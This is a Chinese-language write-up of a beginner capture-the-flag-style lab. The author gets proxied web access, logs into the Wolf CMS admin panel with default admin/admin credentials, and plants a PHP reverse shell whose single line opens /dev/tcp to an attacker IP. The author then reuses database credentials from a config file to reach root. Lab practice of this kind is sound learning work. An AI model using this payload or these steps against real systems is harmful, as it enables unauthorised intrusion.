靶机难度:简单
主机发现
利用arp-scan -l 发现靶机
端口扫描
这里共开放了三个端口,其中22连接不用多说,这里的3128端口是一个代理服务器,在后续访问web页面的时候需要指定代理为 靶机ip:3128
web
可以看到直接访问web端是无法访问的。我们需要指定代理。这里可以用一个小插件或在浏览器设置内更改
再去访问
在页面发现并未其他可用信息,尝试去爆破一下目录,这里需要注意,爆破目录时候也需要加上代理
可用信息不多,这里主要去看一下robots这个文件,在实际渗透中,这个bash history也是应该注意的一个点。
进入到这个界面后,再加上已经得到了cms的具体信息,这时我们应该想办法去找后台。
对于一般的渗透,目前我的思路是首先找到后台登陆地址,其次想办法得到能进入后台的账号密码。怎么得到这个就需要去信息收集或者在前台看能否利用sql注入查询数据库,xss钓鱼,弱口令,字典爆破等。再通过后台的网站权限尝试去进入系统。
这里我犯了一些小小的错误,在知道了cms的信息以后没有第一时间去根据关键字wolfcms去搜集信息而是尝试爆破目录。最后因为一个小小的/?/这个路劲一直没有进展,属实不应该
这里可以找到他的一个登录路径信息
弱口令admin/admin------got it!!
进入后台后,先大眼看一下各个功能点,其实也是信息收集,找到功能点以后再逐个去利用。
这里前三个模块可以修改前端页面,且内嵌有php代码。而最后一个模块有文件上传功能。
这里我选择直接去再第三个模块些的wolf这个页面中插入一个php反弹shell
<?php exec("/bin/bash -c 'bash' -i >& /dev/tcp/192.168.100.150/6666 0>1'");?>
去访问wolf这个页面就可以弹回来了
这里进入系统后直接在当前目录下可以找到一个config文件
这里写了数据库管理员的账户密码。
在www-data的账户下尝试提权没有什么进展,不过操作系统版本比较低感觉可以尝试一下利用系统漏洞提权。这里没有做尝试。
看一下系统有哪些用户
这里可以看到存在sickos这个用户,用上面数据库得到的密码去试试连接
这个用户已经是全权限了,简单的sudo su直接得到root权限
总结
靶机整体难度比较简单,对于新手来说比较友好,思路还是比较常规,从web端入手进入后台执行命令反弹shell,提权也没有遇到什么困难。这次靶机练习主要也是巩固了一下思路,打磨了一下工具使用,最重要的是让我有了信心和耐心去做下去。
对自己想说的
加油吧,我不是一个聪明的人甚至有些愚笨,但是坚持下去,我相信自己一定会有一个令自己满意的成绩。